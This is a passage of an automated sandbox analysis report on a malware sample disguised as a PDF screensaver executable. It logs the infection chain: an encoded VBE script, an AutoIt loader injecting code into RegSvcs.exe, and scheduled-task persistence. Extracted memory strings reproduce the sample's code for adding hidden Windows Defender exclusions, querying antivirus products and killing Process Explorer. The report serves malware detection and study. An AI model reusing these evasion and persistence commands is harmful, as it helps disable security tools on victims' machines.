      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEC030 GetProcessHeap,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F3FF BlockInput,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330D65 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Starts an encoded Visual Basic Script (VBE)
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037BB02 SendInput,keybd_event,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displayname
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: next
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6ecsz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 63209-405:en-usenwscript<
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 23456789
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm:ss tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: m/d/yyyymmmm yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: dddd, mmmm d, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: @nvny
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @mhv0lhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv bhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv`phv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: phv thv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mhvnhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ghvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qhv`ahv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@alv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@jhv vhvpyhv@hhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv0xhvpdhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: yhv fhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bhvpghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @hvpmhvpthvpthv`khv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wpchv ohvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hvrhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhvfhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv`rhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehvpxhv0yhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mvpehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehv`ehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: zhv@nhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ihv uhv f
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from win32_operatingsystem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: *messages***
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?.rar.exe.sfx00?*<>|"?*%c:\\\?\uncconprnauxnulcom#lpt#*messages****messages***r!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptunprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlldirectoryw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdefaultdlldirectories
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitformultipleobjects error %d, getlasterror %d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thread pool initialization failed.%ls>%s: %s
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionbad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: z2fq`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>&nbsp;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_browsetitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmdextracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_skipping
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unexpeof
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_fileheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_headerbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_mainheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_outofmemoryerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unknownmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotopen
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreate
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotmkdir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_encrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_packeddatacrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_writeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_readerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_closeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotfindvol
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badarchive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_asknextvoltitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_archeaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_done
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_error
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_bytes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_modifiedon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badfolder
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_createerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_restarthint
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_crcerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_allfiles
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1a
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_arcbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilesto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestotemp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractbutton
